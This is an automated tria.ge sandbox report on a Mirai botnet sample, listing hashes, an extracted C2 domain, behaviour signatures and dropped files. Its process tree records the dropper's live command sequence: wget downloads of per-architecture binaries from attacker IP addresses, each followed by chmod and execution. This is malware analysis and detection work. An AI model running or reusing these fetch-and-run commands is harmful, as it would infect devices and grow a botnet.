Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    176s
  • max time network
    178s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    02/09/2024, 01:10

General

  • Target

    85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown

  • Size

    8KB

  • MD5

    86311599eaaff9e71ddc72ada1b21c2e

  • SHA1

    572f97e41071d072dfc97127454d4978b50a81e2

  • SHA256

    85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1

  • SHA512

    74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317

  • SSDEEP

    96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7

Score
10/10

Malware Config

Extracted

Family

mirai

C2

www.akck.ru

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Executes dropped EXE 9 IoCs
  • Writes file to system bin folder 1 TTPs 14 IoCs
  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
    /tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
    1⤵
    • Writes file to system bin folder
    PID:714
    • /usr/bin/id
      id
      2⤵
      • Reads runtime system information
      PID:717
    • /bin/sed
      sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p"
      2⤵
      • Reads runtime system information
      PID:718
    • /usr/bin/whoami
      whoami
      2⤵
        PID:725
      • /usr/bin/wget
        wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin"
        2⤵
        • Writes file to system bin folder
        PID:728
      • /usr/bin/wget
        wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx
        2⤵
        • Writes file to system bin folder
        PID:739
      • /bin/chmod
        chmod 0755 ./feankzzyx
        2⤵
          PID:751
        • /bin/feankzzyx
          ./feankzzyx
          2⤵
          • Executes dropped EXE
          PID:752
        • /usr/bin/wget
          wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx
          2⤵
          • Writes file to system bin folder
          PID:754
        • /bin/chmod
          chmod 0755 ./feankzzyx
          2⤵
            PID:755
          • /bin/feankzzyx
            ./feankzzyx
            2⤵
            • Executes dropped EXE
            PID:756
          • /usr/bin/wget
            wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx
            2⤵
            • Writes file to system bin folder
            PID:758
          • /bin/chmod
            chmod 0755 ./feankzzyx
            2⤵
              PID:759
            • /bin/feankzzyx
              ./feankzzyx
              2⤵
              • Executes dropped EXE
              PID:760
            • /usr/bin/wget
              wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx
              2⤵
              • Writes file to system bin folder
              PID:762
            • /bin/chmod
              chmod 0755 ./feankzzyx
              2⤵
                PID:763
              • /bin/feankzzyx
                ./feankzzyx
                2⤵
                • Executes dropped EXE
                PID:764
              • /usr/bin/wget
                wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx
                2⤵
                • Writes file to system bin folder
                PID:766
              • /bin/chmod
                chmod 0755 ./feankzzyx
                2⤵
                  PID:777
                • /bin/feankzzyx
                  ./feankzzyx
                  2⤵
                  • Executes dropped EXE
                  PID:779
                • /usr/bin/wget
                  wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx
                  2⤵
                  • Writes file to system bin folder
                  PID:782
                • /bin/chmod
                  chmod 0755 ./feankzzyx
                  2⤵
                    PID:795
                  • /bin/feankzzyx
                    ./feankzzyx
                    2⤵
                    • Executes dropped EXE
                    PID:797
                  • /usr/bin/wget
                    wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx
                    2⤵
                    • Writes file to system bin folder
                    PID:800
                  • /bin/chmod
                    chmod 0755 ./feankzzyx
                    2⤵
                      PID:815
                    • /bin/feankzzyx
                      ./feankzzyx
                      2⤵
                      • Executes dropped EXE
                      PID:816
                    • /usr/bin/wget
                      wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx
                      2⤵
                      • Writes file to system bin folder
                      PID:819
                    • /bin/chmod
                      chmod 0755 ./feankzzyx
                      2⤵
                        PID:824
                      • /bin/feankzzyx
                        ./feankzzyx
                        2⤵
                        • Executes dropped EXE
                        PID:825
                      • /usr/bin/wget
                        wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx
                        2⤵
                        • Writes file to system bin folder
                        PID:827
                      • /bin/chmod
                        chmod 0755 ./feankzzyx
                        2⤵
                          PID:828
                        • /bin/feankzzyx
                          ./feankzzyx
                          2⤵
                          • Executes dropped EXE
                          • Changes its process name
                          PID:829

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /bin/ALLAH_IS_EVIL.txt

                        Filesize

                        828B

                        MD5

                        654d89fdcfd44330b80fc359d544adb9

                        SHA1

                        53ff7c283c7bab6b7071510349b7785e54da5454

                        SHA256

                        43a54d24621ffaa1dea049234cc1296ec4f1a8285c4c90254202329d9762ca75

                        SHA512

                        d3e32c72576fea7cb0d30957818c8ee61fa951fd7ff59a6fb462b53fe44559cf9eb501e9dad03d05703b4d6b33854ee062a3ba6ef940c46d7fef92a5c278d857

                      • /bin/allah_is_satan

                        Filesize

                        15B

                        MD5

                        640832e65d903e762b84b766ea39ed8e

                        SHA1

                        a35a203fbae4b913edbd5f00cfc92fe076e39532

                        SHA256

                        68bf38c7874a4b54ed0dcc53ee8c55194ad2437818a577364a5735a56a819c2b

                        SHA512

                        f22f27d22110c3ec9f95a84617dbe49d4d59295bce184c31ceac5b5cffed1494107b25d48d1ecedab7c0a2d8ef377e7008732950fee903269c1d1fbdb126449b

                      • /bin/current_user2

                        Filesize

                        5B

                        MD5

                        74cc1c60799e0a786ac7094b532f01b1

                        SHA1

                        552c0ba71b1046a083583ebf943cc9aa09f39a32

                        SHA256

                        53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

                        SHA512

                        21e1bc024bd76c76b68e04614c6def5b03fd4b658e59bfde065b464b520f463711b795455e3a5c81a8a1946b2bca2f83d6c19300a4d3326ce17959a7cbc0846a

                      • /bin/feankzzyx

                        Filesize

                        10B

                        MD5

                        7d91028619a806f35dac54dd9f656276

                        SHA1

                        ce782d0d9bc3b79aaeb84d1ac8ae4c104aec875e

                        SHA256

                        8227203f32d8b00aa0ed784d3f0e11c722f3471d6a99976ee12fa12039fa0484

                        SHA512

                        9a1e0280c742cfc2e725115bc9b902bd6ff8bdfd5e6c40b65c5de320a174b3db5c0252145101867b80f3d5b6b6d354fc93481f5c34474b30e6e176987e09a956

                      • /bin/feankzzyx

                        Filesize

                        137KB

                        MD5

                        bcae0ad478a4924fab82304db8203eed

                        SHA1

                        2e4c52e260bfdaab1f317860ce9455d7a80519e6

                        SHA256

                        7e9239395e7fa0547d8782ecf1b6213ebdab113095406702fb076741f9e51907

                        SHA512

                        73b3a42b595ee8a298ff5dd2ee466628d99ad58625cd3791e671bf91b61acb534dcdae0e87ed279f63b07af0460440b5dec263b3aa8a3bfc47db2925c86d3cc6

                      • /bin/firmware_v4?user=root&dir=%2Fbin

                        Filesize

                        4B

                        MD5

                        2a76ee31e49f38759ed046466b52a513

                        SHA1

                        e31dcb09b650cd3ab532a902888c33da96f45c55

                        SHA256

                        7ca1e25edd006f00775c737c9f1062a685ce2f897ceb52ce6a2bad7292257c1f

                        SHA512

                        e9c4932f7cd5ec940b1de3a82fa19dfc17f19e1eb7c8ef2ed435e637d0a5170d0ef0a5fad37f9092290e9e6bc1b6cea37c45b98a099426264720d57cfa5e93a9

                      • /etc/d

                        Filesize

                        10B

                        MD5

                        61ef923b8276f307b7f125a9acc8f004

                        SHA1

                        37c300cd00115e00f1aff0d227fc6cd38de572b2

                        SHA256

                        3b0aa99677bf9f40c322e3bccaa0e2079e7a99e5516562022c443465e8f9f56e

                        SHA512

                        ea54b8caf3a95c08b132c8b3ba711cfbf992927d7c1d5463d9006b8003190891b2f8ea1302c68dae28c5f7fcdf7b2b7eefbafde9a3129e76e906eea63d5c84ea